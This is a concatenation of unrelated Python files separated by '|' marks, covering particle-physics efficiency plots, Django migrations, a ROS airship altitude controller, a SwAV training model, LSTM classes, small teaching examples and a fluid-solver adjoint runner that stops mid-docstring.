    hist.plotratio(num=output['lxy'][longdecay].sum('dataset').integrate('reco', 'true'),
                   denom=output['lxy'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
                   overflow='over',
                   error_opts={'marker': 'o',},
                   ax=ax,
                   label='PFElectron+PFPhoton')
    hist.plotratio(num=output['lxy-el'][longdecay].sum('dataset').integrate('reco', 'true'),
                   denom=output['lxy-el'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
                   overflow='over',
                   error_opts={'marker': 'o', 'color': 'tab:red', 'fillstyle': 'none',},
                   ax=ax,
                   clear=False,
                   label='PFElectron')
    hist.plotratio(num=output['lxy-pho'][longdecay].sum('dataset').integrate('reco', 'true'),
                   denom=output['lxy-pho'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
                   overflow='over',
                   error_opts={'marker': 'o', 'color': 'tab:green', 'fillstyle': 'none',},
                   ax=ax,
                   clear=False,
                   label='PFPhoton')
    ax.set_ylim([0, 1.05])
    ax.set_yticks(np.arange(0, 1.05, 0.1))
    ax.set_xticks(np.arange(0, 251, 25))
    ax.grid(axis='y', ls='--')
    ax.legend()
    ax.set_title('[signalMC|2mu2e] leptonjet source - egamma candidates\n(PFElectron+PFPhoton) reconstruction efficiency vs. gen electron lxy', x=0.0, ha="left")
    ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
    ax.set_ylabel('Efficiency/2.5', y=1.0, ha="right")
    ax.text( 0.6, 0.6, '$\\geqslant$2 gen electrons with\n$p_T>10GeV, |\\eta|<2.4, vxy<250cm$\n$\\Delta R$(gen,reco)<0.3', transform=ax.transAxes)
    fig.savefig(join(outdir, 'egmcand-effi-vs-lxy_2mu2e.png'))
    fig.savefig(join(outdir, 'egmcand-effi-vs-lxy_2mu2e.pdf'))
    plt.close(fig)

    # ----------------------------------------------------------
    ## EGM leptonjet efficiency, resolution
    output = processor.run_uproot_job(sigDS_2mu2e,
                                      treename='ffNtuplizer/ffNtuple',
                                      processor_instance=EGMLJEffiResoProcessor(),
                                      executor=processor.futures_executor,
                                      executor_args=dict(workers=12, flatten=False),
                                      chunksize=500000,
                                      )

    fig, ax = plt.subplots(figsize=(8,6))
    hist.plotratio(num=output['lxy'][longdecay].sum('dataset').integrate('reco', 'true'),
                   denom=output['lxy'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
                   overflow='over',
                   error_opts={'marker': 'o',},
                   ax=ax,
                   label='EGM-type leptonjet')
    hist.plotratio(num=output['lxy-el'][longdecay].sum('dataset').integrate('reco', 'true'),
                   denom=output['lxy-el'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
                   overflow='over',
                   error_opts={'marker': 'o', 'color': 'tab:red', 'fillstyle': 'none',},
                   ax=ax,
                   clear=False,
                   label='Electron-type leptonjet')
    hist.plotratio(num=output['lxy-pho'][longdecay].sum('dataset').integrate('reco', 'true'),
                   denom=output['lxy-pho'][longdecay].sum('dataset').integrate('reco', 'inclusive'),
                   overflow='over',
                   error_opts={'marker': 'o', 'color': 'tab:green', 'fillstyle': 'none',},
                   ax=ax,
                   clear=False,
                   label='Photon-type leptonjet')
    ax.set_ylim([0, 1.05])
    ax.set_yticks(np.arange(0, 1.05, 0.1))
    ax.set_xticks(np.arange(0, 251, 25))
    ax.grid(axis='y', ls='--')
    ax.legend()
    ax.set_title('[signalMC|2mu2e] EGM-type leptonjet\nreconstruction efficiency vs. gen electron lxy', x=0.0, ha="left")
    ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
    ax.set_ylabel('Efficiency/2.5', y=1.0, ha="right")
    ax.text( 0.6, 0.6, '$\\geqslant$1 gen darkphoton(${}$) with\n$p_T>20GeV, |\\eta|<2.4, lxy<250cm$\n$\\Delta R$(gen,reco)<0.4'.format(r'\rightarrow e^+e^-'), transform=ax.transAxes)
    fig.savefig(join(outdir, 'egmlj-effi-vs-lxy_2mu2e.png'))
    fig.savefig(join(outdir, 'egmlj-effi-vs-lxy_2mu2e.pdf'))
    plt.close(fig)

    fig, ax = plt.subplots(figsize=(8,6))
    hist.plot1d(output['reso'][longdecay].sum('dataset'), overlay='reco', ax=ax, overflow='all', density=True)
    ax.set_title('[signalMC|2mu2e] EGM-type leptonjet $p_T$ resolution', x=0, ha='left')
    ax.set_xlabel(ax.get_xlabel(), x=1.0, ha="right")
    ax.set_ylabel(ax.get_ylabel(), y=1.0, ha="right")
    ax.set_xticks(np.arange(-0.5, 0.51, 0.1))
    fig.savefig(join(outdir, 'egmlj-ptreso_2mu2e.png'))
    fig.savefig(join(outdir, 'egmlj-ptreso_2mu2e.pdf'))
    plt.close(fig)

    # ----------------------------------------------------------
    # Optionally mirror the output directory to the web area via rsync.
    if args.sync:
        webserver = 'wsi@lxplus.cern.ch'
        if '/' in reldir:
            webdir = f'/eos/user/w/wsi/www/public/firehydrant/{reldir.rsplit("/", 1)[0]}'
            cmd = f'rsync -az --exclude ".*" --delete {outdir} --rsync-path="mkdir -p {webdir} && rsync" {webserver}:{webdir}'
        else:
            webdir = '/eos/user/w/wsi/www/public/firehydrant'
            cmd = f'rsync -az --exclude ".*" --delete {outdir} {webserver}:{webdir}'
        print(f"--> sync with: {webserver}:{webdir}")
        os.system(cmd)
|
# Demo: build the spoken form of a mixed English+digit token.
mixed_token = "in99"
# BUG FIX: the original tested `mixed_token.isdigit` — a bound method, which
# is always truthy — instead of calling it; and `isdigit()` on the whole
# token would be False anyway ("in99" is not all digits). The intent is
# "does the token contain any digits".
if any(ch.isdigit() for ch in mixed_token):
    eng_pron = 'in'
    digit_pron = 'jiu4_jiu5'
    spoken_form = eng_pron + '_' + digit_pron
    print(spoken_form)
|
import socket
import asyncore
import uuid
import struct
import logging
log = logging.getLogger('slim')
SLIMPORT = 3483 # server listens on tcp, client on udp
WEBPORT = 9000 # webinterface
BUFFERSIZE = 1024 # reading messages in this blocksize
class SlimProto(object):
    """Implements the Logitech/SlimDevices Squeezebox media
    protocol parsing."""
    # NOTE(review): stub — no parsing logic implemented yet.
    def __init__(self):
        pass
class SlimClient(object):
    """Implements the Logitech/SlimDevices Squeezebox media
    communication layer."""
    def __init__(self, host, port=SLIMPORT):
        # NOTE(review): this opens a UDP socket (SOCK_DGRAM), while the
        # module header says the server listens on TCP at SLIMPORT —
        # confirm the intended transport before implementing send/receive.
        self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        log.debug('connecting to %s:%d' % (host, port))
        # On a UDP socket, connect() only fixes the default peer address.
        self._socket.connect((host, port))
    def send(self, msg):
        """send a SlimProto message to the server"""
        # TODO: not implemented yet.
        pass
    def receive(self, length=None):
        """receive length bytes of data from server,
        and return a SlimProto Object with the parsed data"""
        # TODO: not implemented yet.
        pass
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    # NOTE(review): SlimDiscover is not defined anywhere in this module —
    # this raises NameError as written; presumably the class lives in a
    # missing import or is yet to be written. Confirm before running.
    discover = SlimDiscover()
    asyncore.loop(30)
    discover.send()
|
# Sequence iteration
# Sample sequence used by the doctests below: step heights up and down.
stairs = (1, 2, 3, 4, 5, 4, 3, 4, 5, 6, 7)
from operator import getitem
def count_while(s, value, getitem=getitem, len=len):
    """Count the number of occurrences of value in sequence s.

    >>> stairs.count(4)
    3
    >>> count_while(stairs, 4)
    3
    """
    # getitem/len are bound as default arguments so the loop resolves them
    # as fast locals instead of globals/builtins.
    occurrences, position = 0, 0
    while position < len(s):
        if getitem(s, position) == value:
            occurrences += 1
        position += 1
    return occurrences
def count(s, value):
    """Count the number of occurrences of value in sequence s.

    >>> count(stairs, 4)
    3
    """
    # Generator expression: contribute one for every matching element.
    return sum(1 for element in s if element == value)
def count_same(pairs):
    """Count the number of pairs that contain the same value repeated.

    >>> pairs = ((1, 2), (2, 2), (2, 3), (4, 4))
    >>> count_same(pairs)
    2
    """
    # Unpack each pair and count the ones whose halves compare equal.
    return sum(1 for first, second in pairs if first == second)
few = range(-2, 2)
many = range(-2, 50000000)  # ranges are lazy: no 50M-element list is built

# List mutation
suits = ['coin', 'string', 'myriad']  # A list literal
suits.pop()  # Removes and returns the final element
suits.remove('string')  # Removes the first element that equals the argument
suits.append('cup')  # Add an element to the end
suits.extend(['sword', 'club'])  # Add all elements of a list to the end
suits[2] = 'spade'  # Replace an element
suits
suits[0:2] = ['heart', 'diamond']  # Replace a slice
[suit.upper() for suit in suits]  # List comprehension: transform each element
[suit[1:4] for suit in suits if len(suit) == 5]  # ...with a filter clause

# Dictionaries
numerals = {'I': 1.0, 'V': 5, 'X': 10}
numerals['X']  # Key lookup
numerals['I'] = 1  # Overwrite an existing key's value
numerals['L'] = 50  # Insert a new key
numerals
sum(numerals.values())
dict([(3, 9), (4, 16), (5, 25)])  # Build a dict from (key, value) pairs
numerals.get('A', 0)  # Lookup with a default for missing keys
numerals.get('V', 0)
{x: x*x for x in range(3,6)}  # Dict comprehension
# Key hashability examples: the first and third raise TypeError if
# uncommented (lists are unhashable); the second and fourth are valid.
# {[1]: 2}
# {1: [2]}
# {([1], 2): 3}
# {tuple([1, 2]): 3}
# Identity and equality
def ident():
    """Demonstrate identity vs. copy semantics for lists."""
    suits = ['heart', 'diamond']
    s = suits  # s is an alias: the very same list object
    t = list(suits)  # t is a shallow copy: a distinct list object
    suits += ['spade', 'club']  # in-place extend: visible through s, not t
    t[0] = suits  # t's first element is now a reference to suits
    print(t)
    suits.append('Joker')  # mutates the object t[0] refers to
    print(t)
    t[0].pop()  # pops 'Joker' from suits itself (seen through s too)
    print(s)
|
# Generated by Django 3.1.7 on 2021-06-05 11:36
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: drop the ``number_of_children`` field
    from ``users.Profile``."""

    dependencies = [
        ('users', '0007_auto_20210604_1337'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='profile',
            name='number_of_children',
        ),
    ]
|
#!/usr/bin/env python
## Controls the airship altitude
import rospy
import time
import sys
from geometry_msgs.msg import TransformStamped
from airshippi_vicon.msg import Rotor
#from airshippi_vicon import testmodule
# Global params
P = 90
I = 0.5
D = 0
RATE_HZ = 5 # Hz
VICON_TOPIC = '/vicon/gal_airship/gal_airship'
#VICON_TOPIC = '/vicon/wand_test/wand_test'
class AltitudeController(object):
    """PID altitude controller for the airship.

    Subscribes to Vicon pose updates, recomputes a PID command on each
    sample, and publishes a Rotor (pwm magnitude + direction) at RATE_HZ.
    """
    def __init__(self, z_target=0):
        # Variables
        self.z_target = z_target    # desired altitude
        self.z_current = 0          # last measured altitude
        self.pwm_out = 0            # motor command magnitude, clamped 0..255
        self.direction_out = 0      # 1 when the raw command was positive
        self.new_input = True       # set by callback, cleared after publish
        self.integral = 0           # accumulated integral term
        self.last_error = 0         # previous error, for the derivative term
        # Initialise node
        rospy.init_node('altitude_controller', anonymous=True)
        # Initialise publisher and subscriber
        self.pub = rospy.Publisher('altitude_rotor', Rotor, queue_size=1)
        rospy.Subscriber(VICON_TOPIC, TransformStamped, self.callback, queue_size=1)
    def callback(self, data):
        """Recompute the PID output from a new Vicon pose sample."""
        # Get vertical position
        self.z_current = data.transform.translation.z
        # Get error
        error = self.z_target - self.z_current
        # Get integral
        # NOTE(review): dt is taken as 1/RATE_HZ, i.e. this assumes Vicon
        # messages also arrive at RATE_HZ — confirm; otherwise the I and D
        # terms are mis-scaled.
        self.integral += error/RATE_HZ
        # Get derivative
        derivative = (error - self.last_error)*RATE_HZ
        # Get raw motor value (sign flipped — presumably to match the rotor
        # orientation; confirm against hardware)
        raw_pwm = -(P*error + I*self.integral + D*derivative)
        # Save pwm and direction
        self.direction_out = int(raw_pwm > 0)
        raw_pwm = abs(raw_pwm)
        self.pwm_out = max(0, min(raw_pwm, 255))  # clamp to 8-bit PWM range
        # Note the new input
        self.new_input = True
        # Update error
        self.last_error = error
        # Log it
        #rospy.loginfo(rospy.get_caller_id() + '\nAltitude: %s, Target: %s, Thruster value: %s', z, self.z_target, self.pwm_out)
    def run(self):
        """Publish loop at RATE_HZ; emits a zero command whenever no new
        Vicon sample arrived since the last tick (fail-safe)."""
        # Set rate
        rate = rospy.Rate(RATE_HZ)
        while not rospy.is_shutdown():
            # Construct Rotor and publish it only if a new input was received in the time since the last publish
            if self.new_input:
                rotor = Rotor(pwm=self.pwm_out, direction=self.direction_out)
                self.new_input = False
            else:
                rotor = Rotor(pwm=0, direction=0)
            self.pub.publish(rotor)
            rospy.loginfo("\nAltitude: %s, Target: %s, Thruster value: %s", self.z_current, self.z_target, rotor)
            rate.sleep()
def usage():
    """Return a one-line usage string for this script."""
    return "{} z_target".format(sys.argv[0])
if __name__ == '__main__':
    # Require exactly one CLI argument: the target altitude.
    if len(sys.argv) == 2:
        z_target = float(sys.argv[1])
    else:
        print(usage())
        sys.exit(1)
    print("Setting desired altitude to %s"%(z_target))
    ac = AltitudeController(z_target)
    ac.run()  # blocks until ROS shutdown
|
"""Estos dos primeros métiodos van a permitir abrir un fichero de texto y extraer de él los casos test en forma de
matriz de 3 dimensiones [Primera dimensión: lista de los atributos del ítem. Segunda dimensión: lista de ítems de un día.
Tercera dimensión: lista de listas de cada día. Los casos test están escritos en la siguiente forma:
-------- día X --------
atributo1, atributo2, atributo3 (Nombre del. Ejemplo: Nombre, Caducidad, Calidad)
atributo1, atributo2, atributo3 (del primer ítem)
atributo1, atributo2, atributo3 (del segundo ítem y sucesivamente)
[*SALTO DE LÍNEA*]
---------día X+1--------
[...]
"""
def abrirFichero(rutaAccesoFichero):
    """Open the given file for reading.

    Returns the file object, or [] (after printing the reason) when the
    path is not a string or the file does not exist.
    """
    try:
        if not isinstance(rutaAccesoFichero, str):
            raise ValueError
        return open(rutaAccesoFichero, 'r')
    except FileNotFoundError:
        print("Fichero no encontrado")
    except ValueError:
        print("El nombre del fichero ha de ser un string")
    return []
def accesoCasosTexttest(matrizCasosTest, rutaAccesoFichero):
    """Parse the test-case file into a 3-D matrix: days -> items -> fields.

    Returns the rebuilt matrix; when the file cannot be opened the argument
    matrix is returned unchanged.
    """
    fichero = abrirFichero(rutaAccesoFichero)
    if fichero != []:
        matrizCasosTest = []
        numeroPropiedadesItem = 0
        for linea in fichero:
            if "day" in linea:
                # Day header: start collecting a new day's items.
                casosTestDia = []
            elif linea == "\n":
                # Blank line terminates the current day block.
                # NOTE(review): a final day that is not followed by a blank
                # line is never appended — confirm the file format always
                # ends each day with one.
                matrizCasosTest.append(casosTestDia)
            elif "name" in linea:
                # Column-header line: record how many fields each item has.
                numeroPropiedadesItem = len(linea.split(','))
            else:
                # Item line: split from the right so commas inside the first
                # field (the item name) survive.
                item = linea.rstrip().rsplit(',', maxsplit=numeroPropiedadesItem - 1)
                casosTestDia.append(item)
        fichero.close()
    return matrizCasosTest
def crearFicheroCasosTest(ficheroVolcadoCasosTest, matrizCasosTest):
    """Dump the test-case matrix to a text file, one "Dia N" section per day
    followed by its comma-joined items.

    Prints an error (and writes nothing) when the path is not a string.
    """
    if not isinstance(ficheroVolcadoCasosTest, str):
        print("La ruta de acceso al fichero ha de ser un string")
        return
    # FIX: use a context manager so the file is closed even if a write
    # fails mid-loop (the original left the handle open on error).
    with open(ficheroVolcadoCasosTest, 'w') as salida:
        for (offset, casosTestDia) in enumerate(matrizCasosTest):
            salida.write('-' * 5 + " Dia %d: " % offset + '-' * 5 + '\n')
            for item in casosTestDia:
                salida.write(','.join(item) + '\n')
def mostrarCasosTest(matrizCasosTest):
    """Print each day's header followed by its items, one per line."""
    for numeroDia, itemsDelDia in enumerate(matrizCasosTest):
        print('-' * 5 + " Dia %d: " % numeroDia + '-' * 5)
        for elemento in itemsDelDia:
            print(elemento)
if __name__ == "__main__":
rutaAccesoFichero = "./stdout.gr"
# rutaAccesoFichero = "stdout_bug_conjured.gr"
matrizCasosTest = []
matrizCasosTest = accesoCasosTexttest(matrizCasosTest, rutaAccesoFichero)
mostrarCasosTest(matrizCasosTest)
ficheroVolcadoCasosTest = "./stdout.txt"
crearFicheroCasosTest(ficheroVolcadoCasosTest, matrizCasosTest)
|
# Generated by Django 3.0.6 on 2020-06-16 09:02
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    """Auto-generated migration: alter ``Document.pub_date``.

    NOTE(review): the default is the timestamp frozen at generation time
    (2020-06-16 09:02 UTC), not "now" at row creation — the usual artifact
    of passing a computed value instead of a callable; confirm intended.
    """

    dependencies = [
        ('main', '0008_auto_20200616_0901'),
    ]

    operations = [
        migrations.AlterField(
            model_name='document',
            name='pub_date',
            field=models.DateTimeField(default=datetime.datetime(2020, 6, 16, 9, 2, 43, 591115, tzinfo=utc), null=True, verbose_name='Date de Publication '),
        ),
    ]
|
import numpy as np
import torch
import torch.nn as nn
from cvpods.utils import comm
from torch import distributed as dist
import swav_resnet as resnet_models
class SwAV(nn.Module):
    """SwAV (Swapping Assignments between Views) self-supervised model:
    a backbone with a prototype head trained with the swapped-prediction
    loss over multi-crop views, optionally augmented by a feature queue.
    """
    def __init__(self, cfg):
        super(SwAV, self).__init__()
        self.device = torch.device(cfg.MODEL.DEVICE)
        self.D = cfg.MODEL.SWAV.D                   # projection/feature dim
        self.K = cfg.MODEL.SWAV.K                   # total queue length
        self.K_start = cfg.MODEL.SWAV.K_START       # epoch to start using the queue
        self.P = cfg.MODEL.SWAV.P                   # number of prototypes
        self.T = cfg.MODEL.SWAV.TAU                 # softmax temperature
        self.EPS = cfg.MODEL.SWAV.EPS               # Sinkhorn epsilon
        self.SK_ITERS = cfg.MODEL.SWAV.SK_ITERS     # Sinkhorn-Knopp iterations
        self.improve_numerical_stability = cfg.MODEL.SWAV.NUMERICAL_STABILITY
        self.crops_for_assign = cfg.MODEL.SWAV.CROPS_FOR_ASSIGN
        self.nmb_crops = cfg.MODEL.SWAV.NMB_CROPS
        self.network = resnet_models.__dict__[cfg.MODEL.SWAV.ARCH](
            normalize=True,
            hidden_mlp=cfg.MODEL.SWAV.HIDDEN_MLP,
            output_dim=cfg.MODEL.SWAV.D,
            nmb_prototypes=cfg.MODEL.SWAV.P,
        )
        # create the queue: one slice per assignment crop, holding this
        # worker's share of the K stored embeddings.
        self.register_buffer(
            "queue",
            torch.zeros(len(self.crops_for_assign), self.K // comm.get_world_size(), self.D)
        )
        self.use_the_queue = False
        # self.linear_eval = nn.Linear(encoder_dim, 1000)
        # self.loss_evaluator = nn.CrossEntropyLoss()
        self.softmax = nn.Softmax(dim=1)
        self.to(self.device)

    def forward(self, batched_inputs):
        """Compute the SwAV swapped-prediction loss for a batch of
        multi-crop views.

        Returns a dict with key 'loss' (scalar training loss).
        """
        # NOTE(review): self.epoch and self.steps are never initialized in
        # __init__; presumably assigned externally by the training loop —
        # confirm, otherwise this raises AttributeError.
        if self.epoch >= self.K_start:
            self.use_the_queue = True
        # normalize the prototypes
        with torch.no_grad():
            w = self.network.prototypes.weight.data.clone()
            w = nn.functional.normalize(w, dim=1, p=2)
            self.network.prototypes.weight.copy_(w)
        # # 0 Linear evaluation
        # linear_inputs = [bi['linear'] for bi in batched_inputs]
        # x_linear = self.preprocess_image([bi["image"] for bi in linear_inputs]).tensor
        # logits = self.linear_eval(
        #     torch.flatten(self.avgpool(self.network(x_linear)["res5"].detach()), 1)
        # )
        # labels = torch.tensor([gi["category_id"] for gi in linear_inputs]).cuda()
        # linear_loss = self.loss_evaluator(logits, labels)
        # acc1, acc5 = accuracy(logits, labels, topk=(1, 5))
        # 1. Preprocessing: regroup per-sample crops into per-crop batches.
        contrastive_inputs = torch.stack(
            [bi['contrastive']["image"] for bi in batched_inputs]
        ).permute(1, 0, 2, 3, 4).to(self.device)
        multiview_inputs = torch.stack(
            [bi['multiview']["image"] for bi in batched_inputs]
        ).permute(1, 0, 2, 3, 4).to(self.device)
        inputs = [ci.squeeze(0) for ci in torch.split(contrastive_inputs, 1)] + \
                 [mi.squeeze(0) for mi in torch.split(multiview_inputs, 1)]
        embedding, output = self.network(inputs)
        embedding = embedding.detach()
        bs = inputs[0].size(0)
        # ============ swav loss ... ============
        loss = 0
        for i, crop_id in enumerate(self.crops_for_assign):
            with torch.no_grad():
                out = output[bs * crop_id:bs * (crop_id + 1)]
                if self.use_the_queue:
                    # Prepend queued-embedding scores to stabilize the
                    # Sinkhorn assignment with extra samples.
                    out = torch.cat((
                        torch.mm(self.queue[i], self.network.prototypes.weight.t()),
                        out,
                    ))
                # fill the queue (FIFO: shift old entries back, newest first)
                self.queue[i, bs:] = self.queue[i, :-bs].clone()
                self.queue[i, :bs] = embedding[crop_id * bs:(crop_id + 1) * bs]
                # get assignments
                q = out / self.EPS
                if self.improve_numerical_stability:
                    # Subtract the global max before exp to avoid overflow.
                    M = torch.max(q)
                    dist.all_reduce(M, op=dist.ReduceOp.MAX)
                    q -= M
                q = torch.exp(q).t()
                # Keep only this batch's assignments (drop queue rows).
                q = distributed_sinkhorn(q, self.SK_ITERS)[-bs:]
            # cluster assignment prediction
            subloss = 0
            for v in np.delete(np.arange(np.sum(self.nmb_crops)), crop_id):
                p = self.softmax(output[bs * v:bs * (v + 1)] / self.T)
                subloss -= torch.mean(torch.sum(q * torch.log(p), dim=1))
            loss += subloss / (np.sum(self.nmb_crops) - 1)
        loss /= len(self.crops_for_assign)
        self.steps += 1
        return {
            "loss": loss,
            # "loss_linear": linear_loss,
            # "acc@1": acc1,
            # "acc@5": acc5,
        }
def accuracy(output, target, topk=(1, )):
    """Top-k classification accuracy (in percent) for each k in *topk*.

    output: (batch, classes) logits; target: (batch,) class indices.
    Returns a list of 1-element tensors, one per requested k.
    """
    with torch.no_grad():
        k_max = max(topk)
        n_samples = target.size(0)
        # indices of the k_max highest logits per sample, shape (k_max, batch)
        _, top_idx = output.topk(k_max, 1, True, True)
        top_idx = top_idx.t()
        hits = top_idx.eq(target.view(1, -1).expand_as(top_idx))
        return [
            hits[:k].reshape(-1).float().sum(0, keepdim=True).mul_(100.0 / n_samples)
            for k in topk
        ]
def distributed_sinkhorn(Q, nmb_iters):
    """Sinkhorn-Knopp normalization of Q across all distributed workers.

    Iteratively rescales rows and columns of Q (prototypes x samples) toward
    uniform marginals, synchronizing the row sums with all_reduce so the
    result is consistent across processes. Returns the transposed,
    column-normalized assignment matrix (samples x prototypes).

    NOTE(review): assumes CUDA is available (`.cuda(...)`) and that
    torch.distributed (`dist`) is initialized — confirm with the caller.
    """
    with torch.no_grad():
        # guard against inf entries before normalizing
        Q = shoot_infs(Q)
        sum_Q = torch.sum(Q)
        dist.all_reduce(sum_Q)          # global normalization constant
        Q /= sum_Q
        # target marginals: uniform over rows; columns uniform over the
        # *global* batch (hence the world-size factor)
        r = torch.ones(Q.shape[0]).cuda(non_blocking=True) / Q.shape[0]
        c = torch.ones(Q.shape[1]).cuda(non_blocking=True) / (comm.get_world_size() * Q.shape[1])
        for it in range(nmb_iters):
            u = torch.sum(Q, dim=1)
            dist.all_reduce(u)          # row sums over all workers
            u = r / u
            u = shoot_infs(u)           # row sums of 0 would produce inf
            Q *= u.unsqueeze(1)
            Q *= (c / torch.sum(Q, dim=0)).unsqueeze(0)
        return (Q / torch.sum(Q, dim=0, keepdim=True)).t().float()
def shoot_infs(inp_tensor):
    """Replace every +/-inf entry of *inp_tensor*, in place, by the maximum
    of the tensor taken after those entries are zeroed; returns the tensor.

    Fix: the original looped over torch.nonzero indices in Python and only
    handled rank-1 and rank-2 tensors — for rank >= 3 neither branch matched,
    so infs were left in place and the computed max was itself inf. The
    boolean-mask form is rank-agnostic and runs in C.
    """
    mask_inf = torch.isinf(inp_tensor)
    if mask_inf.any():
        # zero the infs first so torch.max only sees finite values
        inp_tensor[mask_inf] = 0
        inp_tensor[mask_inf] = torch.max(inp_tensor)
    return inp_tensor
|
from bruteforce import Bruteforce
from sieve_of_eratosthenes import SieveOfEratosthenes
if __name__=='__main__':
    # Interactive driver: loop until the user picks the Exit option.
    while True:
        print("""\nWhich program to run:
               1) SieveOfEratosthenes
               2) Brute-Force
               3) Exit""")
        run = input("\nPlease Enter your choice: ")
        if run in ("1", "SieveOfEratosthenes"):
            print(*SieveOfEratosthenes(int(input("\nEnter the max number: "))))
        elif run in ("2", "Bruteforce", "Brute-Force"):
            print(*Bruteforce(int(input("\nEnter the max number: "))))
        elif run in ("3", "exit"):
            break
        else:
            print("\nError. Please enter 1, 2, or 3")
|
import numpy as np
def sigmoid(x):
    """Logistic function 1 / (1 + e^-x); works elementwise on arrays."""
    neg_exp = np.exp(-x)
    return 1.0 / (1.0 + neg_exp)
def sigmoid_derivative(value):
    """Derivative of the sigmoid in terms of its output: s' = s * (1 - s).

    *value* is assumed to already be sigmoid(x).
    Fix: the original `value(1 - value)` *called* value, raising TypeError
    for any numeric argument; the multiplication operator was missing.
    """
    return value * (1 - value)
def tanh_derivative(value):
    """Derivative of tanh in terms of its output: 1 - tanh(x)^2, with value = tanh(x)."""
    return 1.0 - value * value
# create uniform random array w/ values in [a, b] and shape args
def rand_arr(a, b , *args):
    """Uniform random array with values in [a, b) and shape *args.

    NOTE: reseeds NumPy with 0 on every call, so repeated calls return
    identical arrays (the original comment states this is intentional:
    with the same seed, the same random numbers are generated each time).
    """
    np.random.seed(0)
    span = b - a
    return a + span * np.random.rand(*args)
class LstmParam:
    """Weights, biases and their gradients for a single LSTM cell.

    Gates g/i/f/o each have a (mem_cell_ct, x_dim + mem_cell_ct) weight
    matrix acting on the concatenation [x, h_prev], and a 1-D bias of
    length mem_cell_ct.
    """
    def __init__(self, mem_cell_ct, x_dim):
        self.mem_cell_ct = mem_cell_ct
        self.x_dim = x_dim
        # gates operate on the concatenation [x, h_prev]
        concat_len = x_dim + mem_cell_ct
        # weight matrices (cell input g, input gate i, forget gate f, output gate o)
        self.wg = rand_arr(-0.1, 0.1, mem_cell_ct, concat_len)
        self.wi = rand_arr(-0.1, 0.1, mem_cell_ct, concat_len)
        self.wf = rand_arr(-0.1, 0.1, mem_cell_ct, concat_len)
        self.wo = rand_arr(-0.1, 0.1, mem_cell_ct, concat_len)
        # bias terms -- one scalar per memory cell.
        # Fix: the original allocated (mem_cell_ct, concat_len) matrices,
        # which did not match the 1-D bias gradients below and made the
        # subtraction in apply_diff fail to broadcast.
        self.bg = rand_arr(-0.1, 0.1, mem_cell_ct)
        self.bf = rand_arr(-0.1, 0.1, mem_cell_ct)
        self.bi = rand_arr(-0.1, 0.1, mem_cell_ct)
        self.bo = rand_arr(-0.1, 0.1, mem_cell_ct)
        # diffs (derivatives of the loss w.r.t. all parameters).
        # Fix: np.zeros needs the shape as a tuple -- np.zeros(m, n)
        # interprets n as a dtype and raises TypeError.
        self.wg_diff = np.zeros((mem_cell_ct, concat_len))
        self.wf_diff = np.zeros((mem_cell_ct, concat_len))
        self.wi_diff = np.zeros((mem_cell_ct, concat_len))
        self.wo_diff = np.zeros((mem_cell_ct, concat_len))
        self.bg_diff = np.zeros(mem_cell_ct)
        self.bi_diff = np.zeros(mem_cell_ct)
        self.bf_diff = np.zeros(mem_cell_ct)
        self.bo_diff = np.zeros(mem_cell_ct)
    # Apply one SGD step (lr = learning rate), then reset all gradients.
    def apply_diff(self, lr = 1):
        self.wg -= lr * self.wg_diff
        self.wi -= lr * self.wi_diff
        self.wf -= lr * self.wf_diff
        self.wo -= lr * self.wo_diff
        self.bg -= lr * self.bg_diff
        self.bi -= lr * self.bi_diff
        self.bf -= lr * self.bf_diff
        self.bo -= lr * self.bo_diff
        # reset diffs to zero
        self.wg_diff = np.zeros_like(self.wg)
        self.wi_diff = np.zeros_like(self.wi)
        self.wf_diff = np.zeros_like(self.wf)
        self.wo_diff = np.zeros_like(self.wo)
        self.bg_diff = np.zeros_like(self.bg)
        self.bi_diff = np.zeros_like(self.bi)
        self.bf_diff = np.zeros_like(self.bf)
        self.bo_diff = np.zeros_like(self.bo)
class LstmState:
    """Per-timestep activations of one LSTM cell.

    g/i/f/o are the gate activations, s the cell state, h the hidden
    output; bottom_diff_h / bottom_diff_s accumulate gradients flowing
    back into this step. All vectors have length mem_cell_ct.
    """
    def __init__(self, mem_cell_ct, x_dim):
        # x_dim is unused here but kept for interface parity with LstmParam
        for name in ('g', 'i', 'f', 'o', 's', 'h'):
            setattr(self, name, np.zeros(mem_cell_ct))
        self.bottom_diff_h = np.zeros_like(self.h)
        self.bottom_diff_s = np.zeros_like(self.s)
|
#!/usr/bin/python2
import numpy as np
import os
import shutil
import sys
import h5py
#sys.path.insert(0,'/master/home/nishac/.local/lib/python2.7/site-packages')
sys.path.append("/master/home/nishac/fds/")
sys.path.append("/master/home/nishac/S3/")
#import map_sens
import fds
from adFVM.interface import SerialRunner
from adFVM.mesh import Mesh
class S3(SerialRunner):
    """Thin wrapper around adFVM's SerialRunner that runs each solve in a
    per-run scratch directory under <base>/temp/<run_id>/."""
    def __init__(self, *args, **kwargs):
        super(S3, self).__init__(*args, **kwargs)
    def __call__(self, initFields, parameter, nSteps, run_id):
        """Run the primal solver; the 'tempPrimal' scratch case is deleted afterwards."""
        case = '{0}temp/{1}/'.format(self.base, run_id)
        print(case)
        self.copyCase(case)
        data = self.runPrimal(initFields, (parameter, nSteps), case, args='--hdf5')
        if run_id == 'tempPrimal':
            shutil.rmtree(case)
        return data
    def adjoint(self, initPrimalFields, parameter, nSteps, initAdjointFields, run_id):
        """Run the homogeneous adjoint solver and return its first result field."""
        case = '{0}temp/{1}/'.format(self.base, run_id)
        self.copyCase(case)
        data = self.runAdjoint(initPrimalFields, (parameter, nSteps), initAdjointFields, case, homogeneous=True, args='--hdf5')
        return data[0]
def solve_unstable_tangent(runner, tanField, nSteps, time, trjdir):
    """Estimate the leading Lyapunov exponent by power iteration on the
    tangent dynamics, approximated with finite differences of the primal.

    runner: S3 instance; tanField: initial (normalized) tangent vector;
